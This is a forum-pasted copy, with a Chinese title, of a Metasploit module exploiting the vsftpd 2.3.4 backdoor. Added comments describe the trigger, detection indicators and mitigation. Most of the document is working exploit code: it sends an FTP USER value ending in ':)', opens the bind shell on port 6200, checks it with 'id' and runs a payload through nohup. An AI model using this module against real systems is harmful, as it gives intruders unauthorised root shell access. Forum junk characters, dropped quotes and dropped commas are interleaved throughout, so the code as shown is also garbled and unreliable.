VSFTPD v2.3.4 Backdoor 命令执行漏洞
##
# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
; @$ U4 ], j  R! a8 l! ^& ]+ o) D4 ~( N; G% @$ d
, ]1 y2 ~7 z6 s/ K$ Y" \

4 `' b& N! a# m4 K# m8 F7 nrequire msf/core
, _1 s2 v8 m9 a% U, g; n. [& c# a; c
class Metasploit3 < Msf::Exploit::Remote7 Q; H* Z# w3 h5 p0 c
# Metasploit module for the backdoor that shipped inside the vsftpd-2.3.4.tar.gz
# download archive (dates are given in the description below).
#
# NOTE(review): this listing is a forum paste, not the upstream file. The
# interleaved runs such as "2 y5 ~5 Z: @, Y2 ~1 R. W", the missing quotes and
# commas, "Descript_ion" and "_(使用时去掉_)" are rendering/anti-copy artifacts
# of the forum software; do not read them as part of the module's logic.
Rank = ExcellentRanking, t) O& L$ U- c9 x7 H

, w* E* c$ m, R1 _" @9 o/ H7 ^' jinclude Msf::Exploit::Remote::Tcp/ h2 k- Y( X5 i5 F* y, S" V5 _" }& J; f

# Module metadata only: name, description, references, payload constraints and
# the default FTP control port (RPORT 21). Nothing in here touches the network.
3 _. v# ^4 Q! G' z& @  ldef initialize(info = {})
- j0 ~* Q* D& k1 F/ ]super(update_info(info
; Y# g8 F5 r! a# G. x$ yName => VSFTPD v2.3.4 Backdoor Command Execution# W& U/ c% d8 Q/ E/ \- _
Descript_ion => %q{
# l) Q2 f+ e* V( w2 NThis module exploits a malicious backdoor that was added to the VSFTPD download2 y5 ~5 Z: @, Y2 ~1 R. W
archive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between9 a$ \- L6 F! k& x# W' v/ d; b" V
June 30th 2011 and July 1st 2011 according to the most recent information0 L! }7 }0 d- W
available. This backdoor was removed on July 3rd 2011.
5 H0 X1 j& Y5 t9 a1 ?}- g( a6 ^( }7 w% _+ \7 }6 }
Author => [ hdm mc ]! _  ?* F- J/ v- I; ]& ?0 c+ G
License => MSF_LICENSE  x: i7 x2 |# s+ ?* u- d: b5 g
Version => $Revision: 13099 $
/ C4 Q' q, A4 ^+ tReferences =>
4 b1 W$ O: L& k6 F[
; ]- `& Q; Q) x8 M7 a* g[ URL http://pastebin.com/AetT9sS5]$ k4 ~, b" F8 j7 ^" e0 C+ O
# NOTE(review): "_(使用时去掉_)" below is a forum insertion ("remove when using"),
# not part of the reference URL.
[ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]
7 @+ a: M$ N7 @9 z; {/ W) B8 X]
5 }* G8 e, A. KPrivileged => true
/ r$ [" K3 o5 f) N& VPlatform => [ unix ]
# ARCH_CMD: the payload is a command string handed to the backdoor shell, not
# machine code; the Compat block below constrains which command payloads fit.
/ j7 G6 j+ v; ~3 e% {( HArch => ARCH_CMD; f% G" p2 B: S* y2 S' B
Payload =>3 f# j: ]% w) d" c1 \& o& n' c
{
8 t$ o& _9 s( w% |* A+ x" uSpace => 2000
" W: u4 Z. g  \BadChars =>
; R' z3 Q7 L) j7 r( v; g8 L5 `# vDisableNops => true, l2 a6 ^! Q1 v/ Q. |
Compat =>
- r6 S; C( R$ H  N7 S{! D5 ]" W7 W6 B+ N! B" a/ v1 u
PayloadType => cmd_interact& k! Z3 A2 G* ^5 S% {2 U/ b
ConnectionType => find
) ?, k6 C2 r: y}, u+ p6 v  \. P: @8 v
}9 j; T" m. p( o. W
Targets =>8 ^& y% |" J) q0 U- G5 d+ F
[% J! C: r: x( D2 A' A
[ Automatic { } ]) h* r) h' O: Z$ \7 |. |8 \+ v
]
+ ?1 q( d# J4 q  X( {1 ^DisclosureDate => Jul 3 2011) _! x$ b2 J- ~
DefaultTarget => 0))
7 z' a! K7 n1 N- }0 t7 |
# Only option registered is the FTP control port; the backdoor listener port
# (6200) is hard-coded in exploit below.
4 {: A  j% ]1 I* Iregister_options([ Opt::RPORT(21) ] self.class)" B- P! g# }* _& S; d  O$ W
end0 F) v, I% U4 s* ~, l7 h6 [

# Trigger sequence, as a defender should read it:
#   1. probe TCP/6200 first — if something already answers there, a previous
#      trigger (or an unrelated service; handle_backdoor checks) is assumed;
#   2. otherwise open the FTP control port, read the banner, send a USER whose
#      value ends in ":)" (the characters that wake the backdoor) and a random
#      PASS, then probe TCP/6200 again.
# Observable indicators: a vsftpd host newly listening on TCP/6200, and FTP
# control traffic whose USER argument ends in ":)". The 530/331 checks mean an
# anonymous-only server never reaches the trigger path.
# Mitigation: obtain vsftpd from a trusted source and verify archive integrity;
# the description above records that the backdoored archive was replaced on
# July 3rd 2011.
4 l( c( a# g; Y) N3 K( e4 mdef exploit
# q& @0 W- G7 s0 p2 h) h$ i% B/ A( {$ B9 n9 C
# "rescue nil" turns a refused/failed connect into a nil socket instead of an
# exception, so a closed 6200 simply falls through to the FTP path.
nsock = self.connect(false {RPORT => 6200}) rescue nil; g; x! l6 t! R+ m
if nsock
7 B* I$ h" _# `+ J  j, U; ~print_status(The port used by the backdoor bind listener is already open)
9 x* e2 \% i% t8 T- j  |. vhandle_backdoor(nsock)6 h& N2 e, e) |$ m+ t% F
return  l0 \" [, ~. Z/ e
end
$ P  N! G# [5 w3 z) e# ]
2 c0 R/ ?& }0 I0 ?0 B& g- K3 z; X# Connect to the FTP service port first- m* x: c; g" s  N8 v' ]
connect8 @/ N5 b: x2 G! |& t
& p& J; K. s+ c2 n. A; L% B
# get_once(-1 30): read whatever the server sends, presumably with a 30 s
# timeout (the comma was dropped by the forum paste) — confirm against upstream.
banner = sock.get_once(-1 30).to_s4 k; T9 v- V: o8 Y# ]
print_status(Banner: #{banner.strip})
* g( U+ g" t/ w7 i, x9 f: }3 r
# The username is random alphanumerics followed by ":)" — the ":)" suffix,
# split across this line and the next by the paste, is the backdoor trigger.
! `% C1 f, K  K9 m: `) Lsock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)  a, n( a% v2 c+ H8 y: `3 Q
)! Z5 l$ c5 e- B3 M4 p: x9 @9 p
resp = sock.get_once(-1 30).to_s
5 ?2 d% X) k% v8 ?" Pprint_status(USER: #{resp.strip})( L$ [8 k* }  C6 J" ?
7 k7 h7 b" t4 o& [
# A 530 reply to USER means the server rejects non-anonymous logins outright,
# so the code path containing the backdoor is never executed.
if resp =~ /^530 /7 I4 S+ H( i  t3 ]* M( O- c
print_error(This server is configured for anonymous only and the backdoor code cannot be reached)1 y$ e6 N" q  y2 b$ T
disconnect2 @8 _+ _0 h9 I
return
6 ?) e& L$ {/ A: w# Rend) a+ t( O4 n$ b( H/ n' U4 l5 @

# 331 is the FTP "user name okay, need password" reply; anything else is
# treated as an unexpected server and the module gives up.
) |+ K+ L5 M8 i$ I+ ^& [( Pif resp !~ /^331 /) |: `6 ?; n& S( {+ d  X
print_error(This server did not respond as expected: #{resp.strip})
) M) p" h. T. J2 d: i0 Z5 X. pdisconnect
1 P, i3 X' D6 S  }return
7 V- Z9 i$ w: H: e9 Mend" v5 O4 i! Y$ S" N. Y8 N
: U2 C5 \5 ~6 H( l
# The password value is irrelevant; the trigger already happened on USER.
sock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}0 ~  {% T& g8 A& {5 Q
)$ T& b& H. L+ h# e3 z
7 x0 |; v9 R  y
# Do not bother reading the response from password just try the backdoor
+ p: P' I, y& Cnsock = self.connect(false {RPORT => 6200}) rescue nil/ S0 }8 S1 F+ ?& w1 Q' L: d" r
if nsock
5 ^2 b# r+ r5 e. G" Y2 E- o( Jprint_good(Backdoor service has been spawned handling...)7 m4 B  V% o2 p& r1 }
handle_backdoor(nsock)
5 ~* d9 P0 i4 F. B- b: l* G4 Preturn
7 c5 F# ]1 O( J- S. _end0 n$ O% [( ?+ W3 I2 a1 A( ^0 |" t, Q

# No listener appeared on 6200: the host is not backdoored (or the trigger
# did not fire); close the FTP session without reporting success.
# |% k5 G0 h% a% Edisconnect
  ?$ b# o- Q$ K- \% [3 B3 o7 I% _- I' I& j# z
end6 ^1 L6 Y7 e3 ^& n

# Given a socket connected to TCP/6200, confirm it is really a shell before
# handing it to the payload handler: send "id" and require "uid=" in the
# reply, so an unrelated service on that port is not mistaken for the backdoor.
# For detection purposes, "id" followed by a "nohup ..." line on TCP/6200 is the
# second observable stage of this module.
# @param s [Socket] connection to the suspected backdoor listener
% f4 N6 }' b8 o" ?2 k& ddef handle_backdoor(s)
+ F7 j1 ?. I+ k$ C8 @6 h0 i$ ?6 a/ `
1 ^* t" W! O+ J% t4 K' fs.put(id4 a: P# K) {( P9 ]7 a7 E1 s
)
6 I! A5 d! v, [; w" [
# Short (presumably 5 s) read; an empty reply also fails the /uid=/ check.
0 h4 O: S: c3 W4 Sr = s.get_once(-1 5).to_s. K5 t  a1 }+ w4 F8 U! t
if r !~ /uid=/
0 |' S7 @$ \5 `) Sprint_error(The service on port 6200 does not appear to be a shell)
) [/ A1 z, ^8 O# Edisconnect(s)# p+ k3 q2 [' A
return6 M3 `& I% t' z5 y& _; I4 h2 M' p
end/ [% R7 c% r& {( b( B

; A9 T. s- b* Jprint_good(UID: #{r.strip})
7 i2 l. F8 |: j/ [  w3 t. z! g, a. Y- ~% Q
# NOTE(review): "&amp;" is an HTML-escaping artifact of the forum rendering;
# the redirect in the upstream module is presumably "2>&1" — confirm there.
s.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)9 n" {7 n0 a3 n, G$ d# p0 Q
handler(s)6 d( `/ z$ q0 ~
end
. t1 l& D3 D; H" U5 W9 J8 ?3 D+ U  c
) @6 X: r: x5 L1 R$ ~end复制代码+ O- `( I, S. c1 y9 T; T+ P

7 j# j8 \) p: ]* K0 b: t9 v0 o8 F2 }# j0 f! o! q
8 m% a7 E* k; X* I5 t

6 f4 a; S) M6 J" i0 B
, M2 D  V+ W7 o7 v9 z' ^) D" X/ b9 j% i
: K. w1 J, `/ F8 L! L! t
( T7 A' [0 b4 Q9 Y* y

% ?1 z7 a8 i) ]0 g! z  ]3 }4 r4 H! \* ?" |; A2 H; w- O
$ h/ H- \+ \% o5 {/ ^
2 T5 J. M4 s* D$ c
1 [4 d) a9 o( ~+ @4 z4 x1 ~
" N; t; n4 T  y  h+ C
' f4 X" G, O$ U1 Z& M& R* \  G
2 B2 ^# ]6 t+ `0 {! {
( ]4 h5 u/ h. }9 ~+ t
2 M- j' s% \5 O1 a& c

 
